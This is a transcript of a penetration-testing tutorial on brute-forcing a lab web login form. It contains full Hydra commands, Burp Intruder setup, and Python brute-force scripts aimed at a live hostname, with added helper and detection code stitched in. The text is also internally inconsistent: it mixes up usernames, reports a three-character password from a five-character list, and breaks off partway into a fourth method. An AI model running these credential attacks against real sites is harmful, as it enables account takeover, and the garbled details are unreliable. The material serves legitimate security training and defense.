1. web-form brute force methods-libre
TRANSCRIPT
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 1/58
All information contained here is for academic research, web application exploitation research, bug hunting research, laboratory test bed uses, and for educational purposes only. The techniques shown here aren't designed to compromise live machines, web applications or any host. These techniques are laid down on purpose for awareness and research, thereby the authors are not responsible for the actions conducted by individuals in any form. Neither is this document transmissible or re-usable; written permission from the authors is a must, failing which certain legal actions might be provoked.
Web Form Brute Force Methods
Demonstration by Shritam Bhowmick
Web Application Penetration Tester, Independent Consulting Security Evangelist
Dated: 6th August, 2014, Springs, 4:00 PM IST
Web Application Exploitation with Shritam Bhowmick 2
These are web application penetration testing challenges hosted at pentesteracademylab.appspot.com; the lab offers several challenges for web application security researchers to break into in a safe environment. This is for lab practice only, and no part of this document was provided by the original authors.
Contents
Hack
Method 1: Using Hydra to Brute Force Web Logins
Method 2: Using Burp Suite Intruder to Brute Force Web Logins
Method 3: Using Python to break Web-Form Login
Method 4: Using WebSlayer to Brute Force Web Logins
Method 5: Nmap Script Code to break web form
Contact Information
Challenge: Use Brute-force methods to hack into the login pages.
Target: http://pentesteracademylab.appspot.com/lab/webapp/1
Topic: Using Crunch and Brute forces on Web Application Web Forms.
Hack
Hack: So, the usernames are jack and admin for the challenge, which were provided to us as a hint. We have to create a file for the users. This could be done on Linux by issuing the following command:
#echo -e "nick@pentesteracademy.com\nadmin@pentesteracademy.com" > users.txt
Note: echo with the -e switch is used to interpret the \n escape, which is required for a line feed. Also, a [space] isn't appended after the \n, because it would otherwise start the next line with a leading space and the username would not match.
Generating a custom password list with 5 as the minimum and 5 as the maximum size, with xyz as the character set.
Crunch: we'd use crunch to generate our own custom password list. In case there were no hints provided, we could also let Hydra generate the password candidates itself (its -x MIN:MAX:CHARSET option) prior to the brute force attack, but here, to keep things at ease, we've used crunch. Note that for web applications which do not hint you anything, where you cannot expect a minimum or maximum length and do not know which characters are used in the password in the first place, use fuzzdb. This includes username and password files which were pre-generated by the community for the community of hackers. Use fuzzdb for other injections as well, and use it for dictionary attacks if you can't afford a hybrid brute force running for years on a low-end system at your disposal.
To generate passwords using crunch with minimum 5 characters and maximum 5 characters, as given by the hint for this particular challenge, with the characters themselves restricted to x, y and z, use the following command at the Linux command line. That is only 3^5 = 243 candidates per user, which is why a plain brute force is feasible here. Anything helps!
#crunch 5 5 xyz > passwords.txt
What we have is a list of users and a list of passwords. Look at the URL and see if the parameters are being passed in the URL; if they are, it's a GET based request. By default, if the form in the page source doesn't declare a method, it's taken as a GET. To demonstrate this, input any dummy characters in the input fields:
The parameters as well as their values are reflected in the URL, which confirms it's a GET request sent by the client to access the resource:
Now, if we verify this from the source after trying to log in, we will see there is no method attribute on the form in the page source, which again means the default (when not specified by the source) applies and the request is a GET:
The username hints and the domain given were jack and admin as users and pentesteracademy.com as the domain, so the possible username set would be:
Now that we have the valid usernames (before, we used nick and admin to generate the username file as an example, which were invalid), we need to go and brute force the login with this set of usernames and the generated password list taking x, y and z with minimum 5 characters and maximum 5 characters. For this, there are five methods by which we can accomplish the brute force on web applications:
1.) Use Hydra for Brute Forcing
2.) Use Burp Suite as a web-client proxy for Brute Forcing with Intruder
3.) Using python scripts and designing a python script which goes ahead and brute forces the login
4.) Using WebSlayer with Hydra generated password lists
5.) Using the power of the Nmap Scripting Engine to facilitate web form bruteforces.
Method 1: Using Hydra to Brute Force Web Logins:
About Hydra:
For web-based forms, you have to know much more information about the form you are attacking before you start the attack. Every web-based form is slightly different: different URLs and parameters, and different responses for success or failure.
You need to know:
The hostname/IP and URL
Whether it is a HTTPS or HTTP service
Whether the form supports GET or POST (or both)
The parameters of the request
The difference in response between success and failure
Whether any session cookies are required to be set or maintained
What lockout features and thresholds are enabled (if any)
Now for an example consider the form fields, described below in the image:
Here consider the following:
1.) Hostname: the hostname would be your target hostname, or an IP. Just that.
2.) URI: The Uniform Resource Identifier would be the path where the form could be located.
3.) Method: The method shown in the image is POST, but in pentesteracademylab.appspot.com/lab/webapp/1, the one we're into, it's GET, so we'd use GET rather than POST there.
4.) Also, the URI (the path part of the URL) is cut out from the rest of the host information and kept enclosed in double quotes.
5.) Hydra basically iterates through all the username/password combinations until it gets a response that does not contain the blacklisted text, or that does contain the whitelist string if a whitelist string is provided.
6.) The blacklist string would be the string that comes up if the user is not authenticated and the application throws out a string which hydra can pick up; this is the string which, if Hydra does not find it in the response, makes it assume that it's logged in, and it logs the username and password which were successful in bruting the web login.
7.) The whitelist is a different scenario: if Hydra has to detect web login success by a string which proves it was a valid login, hydra will go ahead and, if any such whitelist string is found, log the credentials for that very request sent, i.e. the username and the password for that request (POST or GET).
Not knowing or understanding the above information can be a big cause of failure.
The host is pentesteracademylab.appspot.com.
It's a GET method, so pick up the http-form-get module because it's a web form as well.
The URL, or more specifically the form fields, are situated in /lab/webapp/1 in this case.
With the form fields set, append the email (the user for authentication) and the password placeholders, which will be fed from the appropriate user and password lists; note that this is done in continuation of the form fields in order to complete the form itself. The form field declaration in hydra would be enclosed in double quotes: "/lab/webapp/1:email=^USER^&password=^PASS^
We use email and password as our parameters here because the source code has the email and the password as its entries; if it were a different application, this might change!
Anything in between ^_____^ specifies that hydra needs a feed into these places, which turns out to be the username file and the password file respectively. Notice that there are more
parameters which hydra needs to brute force web login forms, which is the reason the double quotes are not closed yet.
The parameters are separated by colons (:) and the next step is to let hydra know when the login succeeds. For instance, if a user fails to get authenticated, Hydra takes a blacklist string like "Failed" or "Authentication Failure" and checks whether these blacklist words do not appear; if they don't, it's a successful login. So we'd have to append that as well along with "/lab/webapp/1:email=^USER^&password=^PASS^", which would be done by appending yet another colon, for example "/lab/webapp/1:email=^USER^&password=^PASS^:blacklist string". In hydra's syntax this third field is a failure condition by default (equivalently F=string); prefix it with S= instead to supply a success (whitelist) string.
So for now, our whole query for hydra would be: hydra pentesteracademylab.appspot.com http-form-get "/lab/webapp/1:email=^USER^&password=^PASS^:Failed"
Notice that the query ends now with the double quotes in place; we also set the blacklist string to "Failed" because in this web login, any failed login attempt generates the string "Failed! Please Try Again!", which could be seen below:
Alternatively we could also provide whitelist strings in case we know what the successful attempts would look like, and the application never throws any strings on unsuccessful logins on web forms. Now, if we are running Hydra from the directory where our user and password files were generated and stored, we could provide the user and password lists as they are, or give the directory path, for login users using the -L switch and for the password list using the -P switch, which is: -L users.txt -P passwords.txt
Next, we would also add parallelism, because hydra supports parallel brute forcing; the number of parallel tasks is set with the -t switch (hydra's default is 16, and 20 is used here). Keep in mind that more parallel attempts trip a lockout threshold sooner, if one exists.
At last, we include the -o switch to save the results in a text file called results.txt.
Final Query for Hydra: hydra pentesteracademylab.appspot.com http-form-get "/lab/webapp/1:email=^USER^&password=^PASS^:Failed" -L users.txt -P passwords.txt -t 20 -o results.txt
This will fetch the valid logins and passwords, if found using the blacklist string, and store the results in a text file called results.txt.
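The two steps above (reading the form's method and field names from the page source, then writing the colon-separated module spec hydra expects) can be done mechanically. The following is an added example written for this edit, not code from the original paper or from hydra itself; the HTML it parses is constructed to mirror the form the text describes (no method attribute, inputs named email and password) and is not the real lab page source. It emits an explicit F= condition, which is what hydra assumes for a bare third field.

```python
"""Added example: derive the hydra http-form-get/post spec from a login form."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed stand-in for the lab's login page source (assumption, not the real page).
SAMPLE_HTML = """
<html><body>
<form action="/lab/webapp/1">
  <input type="text" name="email">
  <input type="password" name="password">
  <input type="submit" value="Sign In">
</form>
</body></html>
"""


class FormExtractor(HTMLParser):
    """Collect each form's action, method (GET when absent) and named fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # HTML defaults the form method to GET when none is declared
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").upper(),
                "fields": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            name = a.get("name")
            # submit buttons and unnamed inputs carry no credential
            if name and (a.get("type") or "text").lower() != "submit":
                self._current["fields"].append(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def extract_forms(html):
    p = FormExtractor()
    p.feed(html)
    return p.forms


def hydra_form_spec(form, user_field, pass_field, fail_string=None, success_string=None):
    """Build hydra's path:params:condition spec with ^USER^/^PASS^ markers.

    The condition gets an explicit F= (failure) or S= (success) prefix. Any
    literal colon inside the values would have to be escaped as \\: for hydra."""
    if user_field not in form["fields"] or pass_field not in form["fields"]:
        raise ValueError("form does not contain the requested fields")
    params = []
    for f in form["fields"]:
        if f == user_field:
            params.append(f"{f}=^USER^")
        elif f == pass_field:
            params.append(f"{f}=^PASS^")
        else:
            params.append(f"{f}=")          # other fields are sent empty
    if success_string:
        cond = "S=" + success_string
    elif fail_string:
        cond = "F=" + fail_string
    else:
        raise ValueError("hydra needs a failure or success condition string")
    path = urlsplit(form["action"]).path or "/"
    module = "http-form-" + form["method"].lower()
    return module, f"{path}:{'&'.join(params)}:{cond}"


def hydra_command(host, form, user_field, pass_field, **cond):
    """Full command line in the shape the paper uses."""
    module, spec = hydra_form_spec(form, user_field, pass_field, **cond)
    return f'hydra {host} {module} "{spec}" -L users.txt -P passwords.txt -t 20 -o results.txt'


if __name__ == "__main__":
    form = extract_forms(SAMPLE_HTML)[0]
    print(hydra_command("pentesteracademylab.appspot.com", form,
                        "email", "password", fail_string="Failed"))
```

Feeding the parser the real page source instead of SAMPLE_HTML gives the spec for whatever the form actually declares; a form with method="post" yields the http-form-post module automatically.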
#cat results.txt
And you'll probably find the usernames and passwords. Try them all in case hydra goes wrong. For me, the results looked like the following after Hydra went ahead and brute forced the web login, and hence one of the usernames and its corresponding password worked in the scenario:
That was for Hydra. But as we see here, while Hydra is efficient and could get a number of results, it could also go wrong several times without any hints, so there are some other ways we could accomplish this same task. We'll use method 2, which includes using a client-side proxy with Intruder attacks using these same files generated with Crunch at our disposal. Before we begin with Burp, we'll go through some of the basics of Burp which an attacker might need to know beforehand. If you are looking for a detailed discussion on Burp Suite, refer to my other papers which go deep into using Burp Suite as a Web Application Swiss Knife, or use the compiled book delivered by me which has a section on Burp Suite and using the tool to make the most of its benefits.
Method 2: Using Burp Suite Intruder to Brute Force Web Logins:
About Burp Suite:
Burp Suite was designed by PortSwigger as a client-side web proxy which assists interception of HTTP requests and responses, along with support for intercepting web-services based traffic such as WSDL. Burp Suite has been written on the Java platform and provides extensions in other languages with the help of the Jython platform, which lets Python scripts run on the JVM. Most interestingly, Burp Suite provides a framework for web security penetration testers to intercept HTTP traffic, debug applications, as well as black-box test web applications with included tools like Repeater, Intruder, Comparer, Decoder, and much more. The scope of this section covers the Intruder; if you are interested in learning Burp Suite in detail, there is a separate book written by me on it and you could use it to expand your knowledge on this framework, which would be extremely helpful.
To use Burp Suite to the full extent, provided you have enough RAM, the following configuration via the command line on Linux would help start Burp Suite, which is included in Kali Linux already. This version is the free edition of PortSwigger Burp Suite. For the Professional version, which penetration testers use, you'd require to buy a license. Go through the PortSwigger FAQ to know more.
Launching Burp Suite from the Linux terminal with a known good configuration:
Locating Burp Suite on Linux if installed:
Launching the Burp Suite JAR file with a known good configuration, allotting 2 GB of heap to the JVM (the -Xmx flag) on Linux:
Accepting the Burp Agreement and proceeding further:
The Intruder tab is located after the Scanner tab, and it is what we'd use for brute forcing the web form; this will make use of the previously generated usernames and the password list via crunch. But before anything else, we'd require to set up the Burp listener to listen on the provided HTTP port and forward our HTTP packets through the Burp Suite Proxy. This requires configuration on the browser, because the HTTP packets need to be forwarded to Burp via the browser; for this, go to Firefox/Iceweasel Preferences > Advanced tab and find the Proxy Settings. When this is done, the next step is to configure the browser to the below specified ports for Burp to intercept traffic:
After this has been done, anything that you browse via the browser will forward HTTP packets (requests and responses, if responses are set to be intercepted) via the newly configured Burp Proxy. To make sure of this, on Burp Suite, go to the Proxy tab and make sure Interception is set to On.
Browse the target site, in this case http://pentesteracademylab.appspot.com/lab/webapp/1, and note that the Proxy tab now blinks and asks if any modifications are needed before forwarding the request to the web server:
Click on Forward and let the request be sent to the web server; until the request is forwarded, the browser will wait for the response from the web server. In case Burp is configured to intercept the responses as well, it'd go ahead and intercept the responses before forwarding them to the browser for web page presentation. Now that everything is ready and the browser has the response, we will use junk values on this target to capture the HTTP request and send it to Intruder when the proxy tab blinks next; for this, enter any junk values in the web login form fields and hit Sign In to send the HTTP request:
Once Sign In is hit, the Proxy tab will ask for any modifications if needed; here we'd need to right click the request headers and send the request to the Intruder, so we could brute force the form fields:
The Intruder tab now blinks, and we'd need to navigate to the Positions section for additional modifications, like where our given payloads would land for the customized attack:
Burp auto-detects the form fields where the usernames and passwords might be injected. We can change this to our liking, but the default payload positions marked by Burp's special characters (anything enclosed in $ and $) are suitable in this case. We'll choose the Cluster Bomb attack type, because we have two fields to attack: the first one being email, where our username payload would fit, and the second being password, where our generated password file from crunch will fit. The Sniper attack type is for one payload at one field at a time, which is not what we want in this case:
Remember, we have two payloads, one for usernames and another for passwords. From here, we will go to the Payloads section of the Intruder tab, use Simple List as the Payload Type and use Load from the Payload Options to load our generated user list file:
Click Open and Burp would set the users.txt file for payload 1, which corresponds to the email field. Next, we also have a second payload which needs to be set, the passwords.txt which was generated previously by crunch. For this, we'd select Payload Set 2 and then perform the same operations which we did for Payload 1, but here our file will be the generated password list via crunch:
All payloads which went through so far were Simple Lists, because they are newline-separated files which contain usernames for the email field and passwords for the password field, which we previously enumerated looking at the form fields from the source page.
When everything is set up, we would require to navigate to the Intruder option from the menu bar and click on Start Attack, following which Burp Suite would go ahead, using its own HTTP engine, and brute force the form fields:
As for now, we could see that the Intruder has started and is brute forcing the web form.
Next is detecting the successful logins, if any. By default any credentials you throw at this particular web application will fetch you an OK response with the Response Code being 200 and the Reason being OK (look at the HTTP RFCs for more details and at the HTTP document given by me). Now, unsuccessful logins will be given a 200 OK response too, but if we could somehow eliminate 2xx from the column tab, what would be left are the other status codes: 3xx, which would be redirect responses, 4xx, which would be client side errors, and 5xx, which would be any server side errors. Since 2xx are the success responses, which in this case need to be eliminated, we check with this approach first: to do this, we hover over the Filter which currently says Show All, left click and de-select 2xx responses, and now we'd be left with 3xx, 4xx and 5xx responses only:
Now, Intruder shows it's hiding all 2xx responses, and showing us 3xx, 4xx and 5xx responses:
But we haven't made it still, because we see there were no responses which included a redirection which could hint us at a successful login, or anything else which might hint at a successful brute force of the provided credentials for this attack.
What else could be a possible indicator of a successful login? This could be the received content-length header. Now, the next tactical concept is: we receive 2xx for all successful logins as well as unsuccessful logins, nothing is being redirected, which is the reason there were no 3xx status codes on completion of the brute force; but we see that the content-length for nearly all of the responses which were sent was the same. This is provided by the Burp Intruder using the Length column on Intruder upon starting the attack:
We de-select the columns we do not need; preferably, personally I'd de-select request, error, status, timeout, comment and anything else except the payload columns Burp made using the custom tailored payloads and the Length. Because Length is what we need to focus on, and status isn't the concern here, we remain only with the payloads and the response length. Note that Burp's Length column counts the whole response, headers included, so a header whose value changes in size between requests can also shift it:
Now, closely looking at it and scrolling down through the numerous requests made by Burp, we get an exceptional Length value which differs from the other identical ones. This is where we need to stop and inspect:
The length value is different, and the payloads which were the credentials for email and password were admin@pentesteracademy.com and zzz respectively. Upon inspection on the Response tab, and looking at the Render tab, the Burp browser engine will render, and we can be presented with how it would look if a user submitted those credentials:
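The eyeballing done on the Length column above is a length-differential check: almost every row in a cluster-bomb run has the same size, and the one that does not is the candidate to inspect. The following is an added example for this edit, not code from the original paper or from Burp; its result rows are constructed to resemble an Intruder table (status 200 everywhere, one row shorter), and the response sizes and the accepted credential pair are assumptions for the sample, not measurements of the real lab page.

```python
"""Added example: flag Intruder rows whose response length differs from the crowd."""
import itertools
from collections import Counter

USERS = ["jack@pentesteracademy.com", "admin@pentesteracademy.com"]
CHARSET = "xyz"
LENGTH = 5

# Assumed response sizes for the sample; the real page's sizes are not known here.
FAIL_LEN = 1532
SUCCESS_LEN = 1498
VALID = ("admin@pentesteracademy.com", "zzzzz")   # assumed valid pair for the sample


def gen_passwords(charset, length):
    """Every string of the given length over charset, as crunch 5 5 xyz would emit."""
    return ["".join(t) for t in itertools.product(charset, repeat=length)]


def fake_intruder_results():
    """Rows of (email, password, status, length) as Intruder's table would list them."""
    rows = []
    for user, pw in itertools.product(USERS, gen_passwords(CHARSET, LENGTH)):
        length = SUCCESS_LEN if (user, pw) == VALID else FAIL_LEN
        rows.append((user, pw, 200, length))
    return rows


def non_2xx(rows):
    """The text's first filter: hide 2xx and keep redirects and errors."""
    return [r for r in rows if not 200 <= r[2] < 300]


def length_outliers(rows, min_fraction=0.95):
    """Rows whose length is not the dominant one.

    The dominant length must cover at least min_fraction of all rows; otherwise
    the responses vary too much (a size-changing header, rate limiting, errors)
    for a plain length comparison to mean anything, and nothing is reported."""
    if not rows:
        return []
    counts = Counter(r[3] for r in rows)
    baseline, n = counts.most_common(1)[0]
    if n / len(rows) < min_fraction:
        return []
    return [r for r in rows if r[3] != baseline]


if __name__ == "__main__":
    rows = fake_intruder_results()
    print("rows:", len(rows), "non-2xx:", len(non_2xx(rows)))
    for email, pw, status, length in length_outliers(rows):
        print(f"inspect: {email} / {pw} -> {status}, length {length}")
```

The min_fraction guard is the part worth keeping: when the baseline is not overwhelming, a length comparison is telling you about the server's variability, not about a login.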
And that meant the challenge was cracked and we could use those credentials to verify that the username (as email) was admin@pentesteracademy.com and the password used for this particular email was zzz (as per the GET request parameter).
Go to the browser preferences, select no proxy so you could normally browse all sites, and press OK so that Burp does not intercept; or alternatively, go to the Burp Suite Proxy tab and click Intercept is Off to disable interception of any traffic. Another alternative method is using an addon called swap-proxy or other similar addons:
Render the original target page at http://pentesteracademylab.appspot.com/lab/webapp/1 and enter the credentials Burp had cracked using Intruder:
And you'll get the congratulations, which means the credentials were cracked and successfully bruted using the Burp Suite client-side proxy with Intruder and custom tailored payloads.
Alternative to using Crunch: If Crunch is too much pain and making dictionaries automated is the goal, Burp Suite as a framework could be used to make dictionary files automatically using the Intruder tab; here's how one would go ahead and automate the dictionary generation using x, y and z as characters and password complexity set to minimum 5 and maximum 5 for these characters:
On the Payloads tab, set Payload Type to Simple List and manually add the usernames, which here as an example would be jack@pentesteracademy.com and
Click Add and continue adding the usernames to your comfort; the next one shall be the other username, admin@pentesteracademy.com:
Notice that the previous usernames were added. Now select Payload Set 2 and select the Payload Type as Brute forcer:
We'll use the character set xyz in this demonstration because that's the set of password characters being used; make sure in any other scenario you determine this and add the characters likely for that scenario. Set the Min. Length to 5 and the Max. Length to 5 because that's the password complexity for this demonstration. Everything happens in the Payload Options for the Brute forcer set on Payload Set 2:
After everything is set up and done, go to the Intruder on the menu bar discussed before and start the attack; the results would be the same. Check the content-length as discussed before and look for the response which renders the granted access.
The Render tab would now render the representation of the HTML as a browser engine would, and we can therefore determine that the password was indeed cracked via Burp Intruder. Now, there used to be another alternative method which currently is experimental and doesn't work properly with the newer versions of browsers, Firefox preferably, as it was made for Firefox as a .xpi addon; this addon was called FireForce, linked/referenced at:
http://www.scrt.ch/en/attack/downloads/fireforce
Documentation for usage of Fireforce as a web-form login bruteforcer could be found here:
http://www.scrt.ch/outils/fireforce/fireforce_en_manual.pdf
An added reference for Fireforce and how it does what it is supposed to be doing could be found here: http://www.securityaegis.com/easy-breezy-beautiful-password-attacking/
The method for this was not included in this document because Fireforce freezes on large operations on newer Firefox web browsers. As soon as Fireforce releases a stable version for newer versions of Firefox, it'd likely be included in this document. Next, we will look at developing a python script to break the password, using python libraries. For python, the first step would be to learn python, because without knowing python libraries and how python works, one wouldn't be able to automate all of this by developing his/her own scripts. To be able to automate certain web application exploitation, penetration testers use python scripts which they develop in their own free time. This would be shown in the next method, but it is recommended that people learn python to be able to understand the whole of it.
Method 3: Using Python to break Web-Form Login:
About Python:
Using version 2.7.3:
Python terminal:
#python
Exiting the Python terminal command-line test environment: exit()
Enough of the basics, it's time to develop a script which calls the python executable from Linux and loads up the script we develop before it could do anything with it. For this, we use the shebang to make sure that, before executing our code, the Linux environment runs the python executable from /usr/bin, which has a file called python. We'd check what this file is and learn to locate or find where python is by issuing the following commands, but first we create a file called web-form-brute.py using the touch command, so later we can start writing our code here:
The locate command would generate many more results, but for executables we'd use the whereis command to find where python would be, so that later we could use this directory to call the python executable using the shebang before the located file, and then continue writing our code:
At this point, we have many versions of python installed; the default we'd pick up is the one at /usr/bin/python. Now to use the shebang, which is represented by #!, we would have to first use a text editor to open the file which we had created:
We use nano, a text editor which is GNU based, in Linux. Other options on Linux are pico, vim, gedit, leafpad and emacs. There are tons of text editors available; once loaded, the screen prompts us to write text into the editor screen, where we begin with our shebang to include the python executable:
The code:
#!/usr/bin/python
from urllib import urlopen   # Python 2.7: urlopen lives in urllib
import itertools, sys

def gen_passwords(universe, l):
    # use itertools to create a list of all password permutations
    # (every string of length l over the given character set)
    wl = []
    for i in itertools.product(universe, repeat=l):
        wl.append("".join(i))
    return wl

def brute(username):
    # the form is GET based, so the credentials travel in the query string
    root_url = "http://www.pentesteracademylab.appspot.com/lab/webapp/1?email=" + username + "@pentesteracademy.com&password="
    # want to be able to enter a password on the command line and only send that one test
    if len(sys.argv) < 2:
        wl = gen_passwords("xyz", 5)
    else:
        wl = [sys.argv[1]]
    for pw in wl:
        full_url = root_url + pw
        p = urlopen(full_url).read()
        if not "Failed!" in p:   # success: the failure banner is absent from the response
            print "Username: ", username, " Password: ", pw
            break
        else:
            print "Password: %s failed" % pw

brute("admin")
brute("jack")
The Python Code:
root_url would be the whole GET URL, which then takes the username from the defined usernames, which are jack and admin for this demonstration; the defined function brute does this job. Also, we use itertools as our library to iterate. The defined function called gen_passwords takes care of the loop which generates the list of all 5-character strings over x, y and z; brute then sends each one and reports the password whose response did not contain the "Failed" string, which marks the success. Before moving further, chmod +x the python code file to make it executable:
Next, use ./web-form-brute.py to execute the code file and run the script:
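The script above hard-wires the HTTP request into the loop, so it can only be exercised against the live lab. The following is an added example written for this edit, not the paper's script and not Python 2: it is the same brute force in Python 3 with the transport separated from the decision logic, so the loop, the keyspace generation and the hydra-style fail/success-string check can be run offline against a stand-in. fake_login is a constructed stand-in for the target and the credential pair it accepts is an assumption; http_get_login is the transport to use against the real form (the lab URL is from the text), and the delay argument is an addition for throttling that the original does not have.

```python
"""Added example: web-form brute force with the HTTP call separated out."""
import itertools
import time
from urllib.parse import urlencode
from urllib.request import urlopen

FAIL_MARKER = "Failed! Please Try Again!"   # the banner the text reports on bad logins
DOMAIN = "pentesteracademy.com"


def gen_passwords(charset, length):
    """Lazily yield every string of the given length over charset (3**5 = 243 here)."""
    for t in itertools.product(charset, repeat=length):
        yield "".join(t)


def fake_login(email, password):
    """Constructed stand-in for the target: returns the body a GET to the form would give.
    The accepted pair is an assumption, not the real lab's answer."""
    if (email, password) == ("admin@" + DOMAIN, "zzzzz"):
        return "<html><body>Congratulations</body></html>"
    return "<html><body>" + FAIL_MARKER + "</body></html>"


def http_get_login(base_url):
    """Real transport: GET with the credentials in the query string, as the form does."""
    def fetch(email, password):
        url = base_url + "?" + urlencode({"email": email, "password": password})
        with urlopen(url, timeout=10) as r:
            return r.read().decode("utf-8", "replace")
    return fetch


def logged_in(body, fail_string=None, success_string=None):
    """Hydra-style decision: a success string (S=) wins if given; otherwise the
    absence of the failure string (F=) counts as success."""
    if success_string is not None:
        return success_string in body
    if fail_string is None:
        raise ValueError("need a failure or success string")
    return fail_string not in body


def brute(fetch, users, passwords, fail_string=FAIL_MARKER, delay=0.0):
    """Try every user against every password; return {email: password} for hits.
    passwords must be a sequence, not a generator, since it is walked once per user."""
    found = {}
    for user in users:
        email = user + "@" + DOMAIN
        for pw in passwords:
            body = fetch(email, pw)
            if logged_in(body, fail_string=fail_string):
                found[email] = pw
                break
            if delay:
                time.sleep(delay)   # throttle: lockout thresholds are the usual failure mode
    return found


if __name__ == "__main__":
    keyspace = list(gen_passwords("xyz", 5))
    print(brute(fake_login, ["admin", "jack"], keyspace))
    # Against the live lab page, pass the real transport instead of fake_login:
    # brute(http_get_login("http://pentesteracademylab.appspot.com/lab/webapp/1"),
    #       ["admin", "jack"], keyspace, delay=0.2)
```

Because the decision is a substring test, a response that fails for another reason (a rate-limit page, a 5xx body) also lacks the failure banner and would be reported as a hit; that is the same false positive the text warns about with "try them all in case hydra goes wrong", and a success string is the more robust condition whenever one is known.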
The script begins the bruteforcing and until we see the success string appended to the generated password of password complexity 5 minimum and 5 maximum, we have to keep looking at the results. Once the bruteforce gets over and the script has been executed, check through the logs generated (for this one could have redirected the output to something like: ./web-form-brute > results_brute.txt from the execution point) and look for the success string; however, we do get the success string here which would be useful for a successful login:
The password is zzz with the user email being used as admin, which means admin@pentesteracademy.com would be the email for the login form. Use it with the password generated and we will get a successful login:
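Seen from the other side of the wire, the sweep above leaves a distinctive trail: one client hitting /lab/webapp/1 with the same email and a different password on every request. The detector below is an added example, not part of the original document; it parses combined-format access log lines (a constructed sample, not a real capture) and flags any (client, account) pair that tries at least five distinct passwords inside a 60-second window, counting attempts regardless of status code because the lab answers 200 for both outcomes.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Constructed combined-format access log (hypothetical, not a capture from the lab).
# 203.0.113.7 sweeps candidate passwords for one email against the GET-based login
# seen in this document; 198.51.100.4 is ordinary traffic: a typo and a retry.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Aug/2014:16:00:01 +0530] "GET /lab/webapp/1?email=admin@pentesteracademy.com&password=xxxxx HTTP/1.1" 200 618
203.0.113.7 - - [06/Aug/2014:16:00:01 +0530] "GET /lab/webapp/1?email=admin@pentesteracademy.com&password=xxxxy HTTP/1.1" 200 618
203.0.113.7 - - [06/Aug/2014:16:00:02 +0530] "GET /lab/webapp/1?email=admin@pentesteracademy.com&password=xxxxz HTTP/1.1" 200 618
203.0.113.7 - - [06/Aug/2014:16:00:02 +0530] "GET /lab/webapp/1?email=admin@pentesteracademy.com&password=xxxyx HTTP/1.1" 200 618
198.51.100.4 - - [06/Aug/2014:16:00:03 +0530] "GET /lab/webapp/1?email=jack@pentesteracademy.com&password=wrong1 HTTP/1.1" 200 618
203.0.113.7 - - [06/Aug/2014:16:00:03 +0530] "GET /lab/webapp/1?email=admin@pentesteracademy.com&password=xxxyy HTTP/1.1" 200 618
203.0.113.7 - - [06/Aug/2014:16:00:04 +0530] "GET /lab/webapp/1?email=admin@pentesteracademy.com&password=xxxyz HTTP/1.1" 200 618
198.51.100.4 - - [06/Aug/2014:16:01:30 +0530] "GET /lab/webapp/1?email=jack@pentesteracademy.com&password=right1 HTTP/1.1" 200 702
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \d+'
)


def parse_line(line):
    """Split one combined-format line into the fields the detector needs (None if unparsable)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    query = parse_qs(url.query, keep_blank_values=True)  # an empty guess still counts
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": url.path,
        "email": query.get("email", [None])[0],
        "password": query.get("password", [None])[0],
    }


def find_login_bruteforce(log_text, path="/lab/webapp/1",
                          window=timedelta(seconds=60), threshold=5):
    """One alert per (client, account) that tries >= threshold distinct passwords
    against `path` inside any span of length `window`. Status codes are ignored on
    purpose: the lab returns 200 with a "Failed!" body for a wrong guess."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev["path"] == path and ev["email"] and ev["password"] is not None:
            attempts[(ev["ip"], ev["email"])].append((ev["ts"], ev["password"]))
    alerts = []
    for (ip, email), evs in attempts.items():
        evs.sort()
        peak, j = 0, 0
        for i in range(len(evs)):
            # Sliding window: extend j while evs[j] is within `window` of evs[i].
            while j < len(evs) and evs[j][0] - evs[i][0] <= window:
                j += 1
            peak = max(peak, len({pw for _, pw in evs[i:j]}))
        if peak >= threshold:
            alerts.append({"ip": ip, "email": email, "distinct_passwords": peak,
                           "first_seen": evs[0][0], "last_seen": evs[-1][0]})
    return alerts


if __name__ == "__main__":
    for a in find_login_bruteforce(SAMPLE_LOG):
        print(f"brute-force suspected: {a['ip']} -> {a['email']} "
              f"({a['distinct_passwords']} distinct passwords inside one window)")
```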
One just needs to trigger webslayer from his/her terminal the way it's shown above.
Next, we'd see a screen with different tabs which represent crafting of different types of payloads and a ton of things by which we can generate our own custom payloads and brute using these generated payloads:
Capture the request by Live HTTP Headers, which just gives an easy way to input the right headers which would be thrown to this fuzzer. The addon we'd be using here is Live HTTP Headers, which is available in Firefox, or any other tool-set which has the same functionality like Burp, Fiddler, Charles Proxy and many more. If Live HTTP Headers is installed in Firefox (or Iceweasel), bring it up from the menubar, go to Tools and click on Live HTTP Headers.
Make sure the Capture is turned on and refresh the page for http://pentesteracademylab.appspot.com/lab/webapp/1 as shown below:
When done, the page refreshed and all the packets along with the headers went through Live HTTP Headers, and hence Live HTTP Headers captured the HTTP headers because it was set to Capture. Our next move is to copy all these exact headers which were sent by the original browser client to Webslayer, to pretend to be an original client as an original browser client would be.
This was the very first request which the client made, and here we click on Replay to see or copy or replay the original sent request yet again. After clicking on Replay, something like below pops up:
We do not need any POST data to be sent because the form does not have POST enabled for it.
